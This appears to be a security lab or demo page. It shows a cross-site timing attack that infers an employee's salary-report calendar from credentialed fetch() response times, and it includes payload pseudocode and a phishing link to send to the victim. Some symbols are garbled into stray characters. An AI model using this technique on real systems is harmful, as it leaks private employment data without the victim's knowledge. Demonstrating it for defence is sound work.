Attack 3 β Network Timing Oracle
The victim's salary endpoint takes ~400ms when a report exists, responds instantly (404) when not.
fetch() timing leaks the entire employment calendar without reading a single byte of response.
How it works
Payload running in Alice's browser at https://attacker.ssc-primesec.de:
for each (year, month):
const t0 = performance.now()
await fetch('https://intravault.ssc-primesec.de/reports/view?year=Y&month=M',
{ mode: 'no-cors', credentials: 'include' })
const ms = performance.now() - t0 β opaque response, but timing IS readable
if (ms > 150): REPORT EXISTS β server took 400ms (report found)
else: NO REPORT β server returned 401/404 instantly
π Phishing link β send this to Alice
https://attacker.ssc-primesec.de/payload/3
β Open as Alice
Protected β all fast (~15ms, 401) β calendar stays dark.
Vulnerable β real timings (hit=400ms) β employment calendar mapped.
π‘ Live results β salary calendar
| Year | Jan | Feb | Mar | Apr | May | Jun | Jul | Aug | Sep | Oct | Nov | Dec |
|---|
Waiting for payload to executeβ¦